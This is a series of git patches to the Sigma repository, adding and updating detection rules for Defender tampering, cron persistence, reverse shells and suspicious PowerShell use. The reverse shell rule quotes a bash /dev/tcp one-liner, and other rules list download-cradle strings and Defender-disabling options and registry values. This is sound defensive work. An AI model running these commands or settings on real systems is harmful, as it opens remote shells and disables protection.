+9,15 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md author: frack113 date: 2021/06/07 -modified: 2021/08/16 +modified: 2021/10/16 falsepositives: - Unknown level: high logsource: product: windows - service: powershell-classic + category: ps_classic_provider_start definition: fields have to be extract from event detection: - select_EventID: - EventID: 600 tamper_ps_action: HostApplication|contains: 'Set-MpPreference' tamper_ps_option: @@ -28,4 +26,4 @@ detection: - '-DisableBehaviorMonitoring 1' - '-DisableScriptScanning 1' - '-DisableBlockAtFirstSeen 1' - condition: select_EventID and tamper_ps_action and tamper_ps_option + condition: tamper_ps_action and tamper_ps_option diff --git a/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml index f4fc893d..725be9c9 100644 --- a/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml +++ b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml @@ -4,18 +4,17 @@ description: Detects suspicious powershell process which includes bxor command, status: experimental author: Teymur Kheirkhabarov, Harish Segar (rule) date: 2020/06/29 -modified: 2021/08/28 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: "ConsoleHost" filter: HostApplication|contains: From 2b3e40e721345ea7dc34ce82fe7b3c0ba974dd78 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Sat, 16 Oct 2021 02:33:01 -0400 Subject: [PATCH 1251/1367] Rule for Cron activity - file creation --- rules/linux/file_create/cron_files.yml | 33 ++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/linux/file_create/cron_files.yml diff --git a/rules/linux/file_create/cron_files.yml b/rules/linux/file_create/cron_files.yml new file mode 100644 index 00000000..4f0a15f8 --- /dev/null +++ b/rules/linux/file_create/cron_files.yml @@ -0,0 +1,33 @@ +title: Cron Files +id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 +status: experimental +description: Detects creation of cron files or files in Cron directories. Potential persistence. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.persistence + - attack.t1053.003 +references: + - https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml +logsource: + product: linux + category: file_create +detection: + selection1: + TargetFilename|startswith: + - '/etc/cron.d/' + - '/etc/cron.daily/' + - '/etc/cron.hourly/' + - '/etc/cron.monthly/' + - '/etc/cron.weekly/' + - '/var/spool/cron/crontabs/' + selection2: + TargetFilename|contains: + - '/etc/cron.allow' + - '/etc/cron.deny' + - '/etc/crontab' + condition: selection1 or selection2 +falsepositives: + - Any legitimate cron file. +level: medium + \ No newline at end of file From fc796df654b79d5a096880107c5238056a4d6aa7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:37:51 +0200 Subject: [PATCH 1252/1367] add references --- tools/config/generic/powershell.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 30d56127..82ce87c3 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml @@ -1,5 +1,10 @@ title: Conversion of Generic Rules into Powershell Specific EventID Rules order: 15 +# +# some references : +# https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/ +# https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1 +# logsources: ps_module: category: ps_module From 114e44ce6b94cc10d537a3acddf3830920fd7213 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 16 Oct 2021 11:11:19 +0200 Subject: [PATCH 1253/1367] move file --- .../linux/{ => process_creation}/lnx_system_network_discovery.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{ => process_creation}/lnx_system_network_discovery.yml (100%) diff --git a/rules/linux/lnx_system_network_discovery.yml b/rules/linux/process_creation/lnx_system_network_discovery.yml similarity index 100% rename from rules/linux/lnx_system_network_discovery.yml rename to rules/linux/process_creation/lnx_system_network_discovery.yml From ae22f2ae7eaaaa3d0a4b8b5fdc138a8bc97e5fab Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 16 Oct 2021 14:21:55 +0200 Subject: [PATCH 1254/1367] rule: Linux Bash reverse shell indicators --- .../lnx_back_connect_shell_dev.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/linux/process_creation/lnx_back_connect_shell_dev.yml diff --git a/rules/linux/process_creation/lnx_back_connect_shell_dev.yml b/rules/linux/process_creation/lnx_back_connect_shell_dev.yml new file mode 100644 index 00000000..63a2ffd4 --- /dev/null +++ b/rules/linux/process_creation/lnx_back_connect_shell_dev.yml @@ -0,0 +1,23 @@ +title: Linux Reverse Shell Indicator +id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 +status: experimental +description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') +references: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +date: 2021/10/16 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter +falsepositives: + - Unknown +level: critical + From 6660be975331c122d3ab9a3477f2ea051f7645d7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 16 Oct 2021 14:22:48 +0200 Subject: [PATCH 1255/1367] config: network connection linux --- tools/config/generic/sysmon.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index d7fc8989..a325c204 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -33,6 +33,14 @@ logsources: rewrite: product: windows service: sysmon + network_connectio_linux: + category: network_connection + product: linux + conditions: + EventID: 3 + rewrite: + product: linux + service: sysmon sysmon_status: category: sysmon_status product: windows From 7fc6532665156da0c2224a25523dc63ddf20a959 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 22:49:20 +0200 Subject: [PATCH 1256/1367] fix yml --- tools/config/splunk-windows.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 584fdfbf..06b0c730 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml @@ -32,7 +32,7 @@ logsources: # Optimized search for process creation, being dramatically faster in Lispy than just EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. # This also supports custom splunk macros, just like they are written in splunk (i.e. as `macro`), minding that it has to be written inside the string quotes here. search: 'ParentProcessGuid EventCode=1' - windows-process-creation: + windows-file-creation: product: windows service: sysmon category: file_creation From 5756888b1b7ca4659eaa7ee376f67c51b2f4c1e5 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 17 Oct 2021 08:33:32 +0200 Subject: [PATCH 1257/1367] adds the alternative options --- ..._creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index 1072fdb3..67dc8ab3 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -18,7 +18,9 @@ detection: selection: CommandLine|contains: - '-i' + - '/install' - '-a' + - '/add-driver' - '.inf' Image|endswith: - '\pnputil.exe' From 17d78a5c4c3fe0c75b627fe71445045dc6462d3a Mon Sep 17 00:00:00 2001 From: Wagga <6437862+wagga40@users.noreply.github.com> Date: Sun, 17 Oct 2021 16:21:59 +0200 Subject: [PATCH 1258/1367] Fix a missing var reset in SQLite backend --- tools/sigma/backends/sqlite.py | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/sigma/backends/sqlite.py b/tools/sigma/backends/sqlite.py index 1f7e4e7e..0b445b59 100644 --- a/tools/sigma/backends/sqlite.py +++ b/tools/sigma/backends/sqlite.py @@ -109,6 +109,7 @@ class SQLiteBackend(SQLBackend): return self.generateFTS(self.cleanValue(str(node))) def generateQuery(self, parsed): + self.countFTS = 0 return self._generateQueryWithFields(parsed, list("*")) def checkFTS(self, parsed, result): From ccf6c8df38ef8ded5bbc679e73e4ead486b965f5 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Mon, 18 Oct 2021 10:07:44 +0400 Subject: [PATCH 1259/1367] Create new rule for detecting Microsfot Defender Tampering via Registry --- .../registry_event_defender_disabled.yml | 11 +++--- ..._defender_realtime_protection_disabled.yml | 36 +++++++++++++++++++ 2 files changed, 43 insertions(+), 4 deletions(-) create mode 100644 rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml diff --git a/rules/windows/registry_event/registry_event_defender_disabled.yml b/rules/windows/registry_event/registry_event_defender_disabled.yml index bdff48ba..0d3faa4e 100644 --- a/rules/windows/registry_event/registry_event_defender_disabled.yml +++ b/rules/windows/registry_event/registry_event_defender_disabled.yml @@ -5,12 +5,13 @@ related: type: derived description: Detects disabling Windows Defender threat protection date: 2020/07/28 -modified: 2021/09/21 -author: Ján Trenčanský, frack113 +modified: 2021/10/18 +author: Ján Trenčanský, frack113, AlertIQ references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md -status: test + - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ +status: experimental tags: - attack.defense_evasion - attack.t1089 # an old one @@ -21,7 +22,9 @@ logsource: detection: tamper_registry: EventType: SetValue - TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus' Details: 'DWORD (0x00000001)' selection2: TargetObject: diff --git a/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml b/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml new file mode 100644 index 00000000..2eb860fa --- /dev/null +++ b/rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml @@ -0,0 +1,36 @@ +title: Windows Defender Real-Time Protection Disabled +id: fd115e64-97c7-491f-951c-fc8da7e042fa +description: Detects disabling Windows Defender Real-Time Protection by modifying registry +date: 2021/10/18 +author: AlertIQ +references: + - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ + - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 +status: experimental +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + category: registry_event +detection: + tamper_registry1: + EventType: SetValue + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen' + Details: 'DWORD (0x00000001)' + tamper_registry2: + EventType: SetValue + TargetObject: + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting' + - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent' + Details: 'DWORD (0x00000000)' + condition: tamper_registry1 or tamper_registry2 +falsepositives: + - Administrator actions +level: high \ No newline at end of file From 40e8dc506aaf58d6fc7a765667b69c15f2fb0bc5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 11:19:18 +0200 Subject: [PATCH 1260/1367] update product list --- ...n_susp_wmic_security_product_uninstall.yml | 20 ++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml b/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml index 68e3f491..11e06462 100644 --- a/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml +++ b/rules/windows/process_creation/win_susp_wmic_security_product_uninstall.yml @@ -3,7 +3,9 @@ id: 847d5ff3-8a31-4737-a970-aeae8fe21765 description: Detects deinstallation of security products using WMIC utility references: - https://twitter.com/cglyer/status/1355171195654709249 + - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2021/01/30 +modified: 2021/10/18 status: experimental author: Florian Roth tags: @@ -22,13 +24,21 @@ detection: selection_product: CommandLine|contains: - 'Antivirus' - - 'Endpoint Security' - - 'Endpoint Detection' + - 'AVG ' - 'Crowdstrike Sensor' - - 'Windows Defender' - - 'VirusScan' - - 'Threat Protection' + - 'DLP Endpoint' + - 'Endpoint Detection' + - 'Endpoint Protection' + - 'Endpoint Security' - 'Endpoint Sensor' + - 'ESET File Security' + - 'Malwarebytes' + - 'McAfee Agent' + - 'Microsoft Security Client' + - 'Threat Protection' + - 'VirusScan' + - 'Webroot SecureAnywhere' + - 'Windows Defender' condition: selection and selection_product falsepositives: - Legitimate administration From 278c01c59fc2e5ffe42749b45fa5a3ddf870c44d Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:12:10 +0200 Subject: [PATCH 1261/1367] move to deprecated --- .../{powershell => deprecated}/powershell_suspicious_download.yml | 0 .../powershell_suspicious_invocation_generic.yml | 0 .../powershell_suspicious_invocation_specific.yml | 0 .../powershell_syncappvpublishingserver_exe.yml | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{powershell => deprecated}/powershell_suspicious_download.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_suspicious_invocation_generic.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_suspicious_invocation_specific.yml (100%) rename rules/windows/{powershell => deprecated}/powershell_syncappvpublishingserver_exe.yml (100%) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/deprecated/powershell_suspicious_download.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_download.yml rename to rules/windows/deprecated/powershell_suspicious_download.yml diff --git a/rules/windows/powershell/powershell_suspicious_invocation_generic.yml b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_invocation_generic.yml rename to rules/windows/deprecated/powershell_suspicious_invocation_generic.yml diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml similarity index 100% rename from rules/windows/powershell/powershell_suspicious_invocation_specific.yml rename to rules/windows/deprecated/powershell_suspicious_invocation_specific.yml diff --git a/rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml similarity index 100% rename from rules/windows/powershell/powershell_syncappvpublishingserver_exe.yml rename to rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml From 19da3ac07f41f988c9611131d7a98ce2756ce5bd Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:12:52 +0200 Subject: [PATCH 1262/1367] add ps_module version --- ...ell_suspicious_download_in_contextinfo.yml | 29 ++++++++ ...ious_invocation_generic_in_contextinfo.yml | 36 ++++++++++ ...ous_invocation_specific_in_contextinfo.yml | 67 +++++++++++++++++++ ...ppvpublishingserver_exe_in_contextinfo.yml | 27 ++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml create mode 100644 rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml new file mode 100644 index 00000000..1cd4d88a --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml @@ -0,0 +1,29 @@ +title: Suspicious PowerShell Download +id: de41232e-12e8-49fa-86bc-c05c7e722df9 +related: + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived +status: experimental +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module +detection: + webclient: + ContextInfo|contains: + - 'System.Net.WebClient' + download: + ContextInfo|contains: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml new file mode 100644 index 00000000..7ea09209 --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml @@ -0,0 +1,36 @@ +title: Suspicious PowerShell Invocations - Generic +id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 +related: + id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule) +date: 2017/03/12 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module +detection: + encoded: + ContextInfo|contains: + - ' -enc ' + - ' -EncodedCommand ' + hidden: + ContextInfo|contains: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + noninteractive: + ContextInfo|contains: + - ' -noni ' + - ' -noninteractive ' + condition: all of them +falsepositives: + - Penetration tests + - Very special / sneaky PowerShell scripts +level: high diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml new file mode 100644 index 00000000..747f5270 --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_specific_in_contextinfo.yml @@ -0,0 +1,67 @@ +title: Suspicious PowerShell Invocations - Specific +id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 +related: + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_module + definition: Script block logging must be enabled +detection: + convert_b64: + ContextInfo|contains|all: + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' + iex_selection: + ContextInfo|contains|all: + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' + enc_selection: + ContextInfo|contains|all: + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' + reg_selection: + ContextInfo|contains|all: + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' + webclient_selection: + ContextInfo|contains|all: + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' + iex_webclient: + ContextInfo|contains|all: + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: 1 of them +falsepositives: + - Penetration tests +level: high diff --git a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml new file mode 100644 index 00000000..c3baddcf --- /dev/null +++ b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml @@ -0,0 +1,27 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: fe5ce7eb-dad8-467c-84a9-31ec23bd644a +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/10/18 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: ps_module +detection: + selection: + ContextInfo|contains: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From d866b10590bb9f9f1a8413a5f0d0343982dc53ea Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:13:29 +0200 Subject: [PATCH 1263/1367] add ps_script verison --- ...suspicious_download_in_scriptblocktext.yml | 29 ++++++++ ..._invocation_generic_in_scriptblocktext.yml | 36 ++++++++++ ..._invocation_specific_in_scripblocktext.yml | 67 +++++++++++++++++++ ...ublishingserver_exe_in_scriptblocktext.yml | 27 ++++++++ 4 files changed, 159 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml create mode 100644 rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml new file mode 100644 index 00000000..f31303da --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml @@ -0,0 +1,29 @@ +title: Suspicious PowerShell Download +id: 403c2cc0-7f6b-4925-9423-bfa573bed7eb +related: + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived +status: experimental +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script +detection: + webclient: + ScriptBlockText|contains: + - 'System.Net.WebClient' + download: + ScriptBlockText|contains: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml new file mode 100644 index 00000000..9b175b6f --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml @@ -0,0 +1,36 @@ +title: Suspicious PowerShell Invocations - Generic +id: ed965133-513f-41d9-a441-e38076a0798f +related: + id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule) +date: 2017/03/12 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script +detection: + encoded: + ScriptBlockText|contains: + - ' -enc ' + - ' -EncodedCommand ' + hidden: + ScriptBlockText|contains: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + noninteractive: + ScriptBlockText|contains: + - ' -noni ' + - ' -noninteractive ' + condition: all of them +falsepositives: + - Penetration tests + - Very special / sneaky PowerShell scripts +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml new file mode 100644 index 00000000..89489c32 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml @@ -0,0 +1,67 @@ +title: Suspicious PowerShell Invocations - Specific +id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 +related: + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived +status: experimental +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth (rule), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2021/10/18 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + convert_b64: + ScriptBlockText|contains|all: + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' + iex_selection: + ScriptBlockText|contains|all: + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' + enc_selection: + ScriptBlockText|contains|all: + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' + reg_selection: + ScriptBlockText|contains|all: + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' + webclient_selection: + ScriptBlockText|contains|all: + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' + iex_webclient: + ScriptBlockText|contains|all: + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: 1 of them +falsepositives: + - Penetration tests +level: high diff --git a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml new file mode 100644 index 00000000..30e37a01 --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml @@ -0,0 +1,27 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: dddfebae-c46f-439c-af7a-fdb6bde90218 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: 'Ensar Şamil, @sblmsrsn, OSCD Community' +date: 2020/10/05 +modified: 2021/10/18 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: ps_script +detection: + selection: + ScriptBlockText|contains: + - 'SyncAppvPublishingServer.exe' + condition: selection +falsepositives: + - App-V clients +level: medium \ No newline at end of file From 0e1c156ddfc38bb7edfe39c9f3870826d234c687 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:26:06 +0200 Subject: [PATCH 1264/1367] fix related --- ...owershell_suspicious_invocation_generic_in_contextinfo.yml | 4 ++-- ...shell_suspicious_invocation_generic_in_scriptblocktext.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml index 7ea09209..93e5ecb5 100644 --- a/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_invocation_generic_in_contextinfo.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Invocations - Generic id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 related: - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived status: experimental description: Detects suspicious PowerShell invocation command parameters tags: diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml index 9b175b6f..94529b39 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_invocation_generic_in_scriptblocktext.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Invocations - Generic id: ed965133-513f-41d9-a441-e38076a0798f related: - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived status: experimental description: Detects suspicious PowerShell invocation command parameters tags: From faa407dacc909b098d96654df00f44d1ad0e299b Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 18 Oct 2021 14:52:35 +0200 Subject: [PATCH 1265/1367] cleanup list --- .../powershell_suspicious_download_in_contextinfo.yml | 3 +-- 